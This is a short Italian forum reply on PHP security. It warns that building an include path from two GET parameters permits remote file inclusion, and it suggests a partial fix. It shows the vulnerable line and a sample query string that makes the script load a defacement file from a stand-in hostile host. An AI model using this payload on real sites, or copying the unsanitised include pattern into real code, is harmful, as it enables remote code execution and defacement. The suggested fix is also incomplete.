A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.Codice PHP:
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
Quindi con
http://www.sitobastardo.com/inc_defacciamitutto.php
basta chiamare
tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com
Almeno così mi sembra, se non mi sto rincoglionendo del tutto![]()
Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito.